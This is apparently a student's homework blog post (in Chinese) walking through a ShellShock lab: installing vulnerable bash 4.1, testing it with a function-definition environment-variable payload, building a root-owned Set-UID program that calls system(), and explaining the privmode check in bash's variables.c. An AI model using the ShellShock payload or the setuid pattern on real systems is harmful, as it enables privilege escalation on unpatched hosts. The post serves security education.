zoukankan      html  css  js  c++  java
  • 20199301《Linux内核原理与分析》第十二周作业

    ShellShock攻击实验

    一、环境搭建

    下载

    $ sudo su
    $ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
    

    安装

    $ tar xf bash-4.1.tar.gz
    $ cd bash-4.1
    $ ./configure 
    $ make && make install
    

    链接

    $ rm /bin/bash
    $ ln -s /usr/local/bin/bash /bin/bash
    

    到这里就安装完毕,下面检测是否存在shellshock漏洞。

    $ exit
    $ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"
    

    输出vulnerable就说明bash有漏洞。

    最后,让/bin/sh 指向/bin/bash.

    $ sudo ln -sf /bin/bash /bin/sh
    

    实验环境一切就绪,进入下一步!

    二、预备知识

    了解bash自定义函数,只需要函数名就能够调用该函数。

    $ foo() { echo bar; } 
    $ foo
    > bar
    copy
    

    这个时候的Bash的环境变量:

    KEY = foo
    VALUE = () { echo bar; }
    copy
    

    来看看ShellShock漏洞的真身:

    export foo='() { :; }; echo Hello World'
    bash
    >Hello World
    copy
    

    为什么调用bash的时候输出Hello World呢?瞧瞧他的内部情况:

    KEY = foo
    VALUE = () { :; }; echo Hello World
    copy
    

    bash读取了环境变量,在定义foo之后直接调用了后面的函数。 一旦调用bash,自定义的语句就直接触发。

    三、实验内容

    攻击Set-UID程序

    本实验中,我们通过攻击Set-UID程序来获得root权限。

    我们知道system()函数将调用"/bin/sh -c" 来运行指定的命令, 这也意味着/bin/bash 会被调用,你能够利用shellshock漏洞来获取权限么? 首先,确保安装了带有漏洞的bash版本,并让/bin/sh 指向/bin/bash.

    $ sudo ln -sf /bin/bash /bin/sh
    

    在 /home/shiyanlou 目录下新建一个 shock.c 文件:

    $ vi shock.c
    

    按 I 键切换到插入模式,再输入如下内容:

    #include <stdio.h>
    void main()
    {
        setuid(geteuid()); // make real uid = effective uid.
        system("/bin/ls -l");
    }
    

    编译这段代码,并设置其为Set-UID程序,保证它的所有者是root。

    $ sudo su
    $ gcc -o shock shock.c
    $ chmod u+s shock
    


    我们注意到这里使用了setuid(geteuid()) 来使real uid = effective uid,这在Set-UID程序中不是普遍现象,但它确实有时会发生。 先自己试着hack一下:) 以下是hack过程:

    如果 setuid(geteuid()) 语句被去掉了,再试试看攻击,我们还能够拿到权限么?

    $ sudo su
    $ gcc -o sh0ck shock.c
    $ chmod u+s sh0ck
    $ ls -il sh0ck
    $ exit
    $ ./sh0ck
    

    (hack过程与step1完全一样,sh0ck是编译后的程序)

    失败了!这就说明如果 real uid 和 effective uid 相同的话,定义在环境变量中的内容在该程序内有效,那样shellshock漏洞就能够被利用了。但是如果两个 uid 不同的话,环境变量失效,就无法发动攻击了,这可以从 ####bash的源代码中得到印证(variables.c,在308到369行之间)请指出是哪一行导致了这样的不同,并说明bash这样设计的原因。

    这里给出部分代码

    /* Initialize the shell variables from the current environment.
       If PRIVMODE is nonzero, don't import functions from ENV or
       parse $SHELLOPTS. */
    void
    initialize_shell_variables (env, privmode)
         char **env;
         int privmode;
    {
      char *name, *string, *temp_string;
      int c, char_index, string_index, string_length;
      SHELL_VAR *temp_var;
    
      create_variable_tables ();
    
      for (string_index = 0; string = env[string_index++]; )
        {
    
          char_index = 0;
          name = string;
          while ((c = *string++) && c != '=')
      ;
          if (string[-1] == '=')
      char_index = string - name - 1;
    
          /* If there are weird things in the environment, like `=xxx' or a
       string without an `=', just skip them. */
          if (char_index == 0)
      continue;
    
          /* ASSERT(name[char_index] == '=') */
          name[char_index] = '';
          /* Now, name = env variable name, string = env variable value, and
       char_index == strlen (name) */
    
          temp_var = (SHELL_VAR *)NULL;
    
          /* If exported function, define it now.  Don't import functions from
       the environment in privileged mode. */
          if (privmode == 0 && read_but_dont_execute == 0 && STREQN ("() {", string, 4))
      {
        string_length = strlen (string);
        temp_string = (char *)xmalloc (3 + string_length + char_index);
    
        strcpy (temp_string, name);
        temp_string[char_index] = ' ';
        strcpy (temp_string + char_index + 1, string);
    
        parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);
    
        /* Ancient backwards compatibility.  Old versions of bash exported
           functions like name()=() {...} */
        if (name[char_index - 1] == ')' && name[char_index - 2] == '(')
          name[char_index - 2] = '';
    
        if (temp_var = find_function (name))
          {
            VSETATTR (temp_var, (att_exported|att_imported));
            array_needs_making = 1;
          }
        else
          report_error (_("error importing function definition for `%s'"), name);
    
        /* ( */
        if (name[char_index - 1] == ')' && name[char_index - 2] == '')
          name[char_index - 2] = '(';   /* ) */
      }
    

    摘出其中关键部分并简化

    void initialize_shell_variables(){
    // 循环遍历所有环境变量
    for (string_index = 0; string = env[string_index++]; ) {
         /*...*/
         /* 如果有export过的函数, 在这里定义 */
         /* 无法导入在特权模式下(root下)定义的函数 */
         if (privmode == 0 && read_but_dont_execute == 0 &&
               STREQN (“() {“, string, 4)) {
               [...]
               // 这里是shellshock发生的地方
               // 传递函数定义 + 运行额外的指令
               parse_and_execute (temp_string, name,
                    SEVAL_NONINT|SEVAL_NOHIST);
    [...]
    } }
    

    就是上述那一行判断逻辑导致了两者的不同,primode即私有模式,要求real uid 与 effective uid保持一致

    四、遇到的问题

  • 相关阅读:
    重新想象 Windows 8 Store Apps (15) 控件 UI: 字体继承, Style, ControlTemplate, SystemResource, VisualState, VisualStateManager
    重新想象 Windows 8 Store Apps (12) 控件之 GridView 特性: 拖动项, 项尺寸可变, 分组显示
    返璞归真 asp.net mvc (10) asp.net mvc 4.0 新特性之 Web API
    与众不同 windows phone (29) Communication(通信)之与 OData 服务通信
    与众不同 windows phone (33) Communication(通信)之源特定组播 SSM(Source Specific Multicast)
    与众不同 windows phone (27) Feature(特性)之搜索的可扩展性, 程序的生命周期和页面的生命周期, 页面导航, 系统状态栏
    与众不同 windows phone (30) Communication(通信)之基于 Socket TCP 开发一个多人聊天室
    返璞归真 asp.net mvc (12) asp.net mvc 4.0 新特性之移动特性
    重新想象 Windows 8 Store Apps (2) 控件之按钮控件: Button, HyperlinkButton, RepeatButton, ToggleButton, RadioButton, CheckBox, ToggleSwitch
    重新想象 Windows 8 Store Apps (10) 控件之 ScrollViewer 特性: Chaining, Rail, Inertia, Snap, Zoom
  • 原文地址:https://www.cnblogs.com/lsqz/p/11981932.html
Copyright © 2011-2022 走看看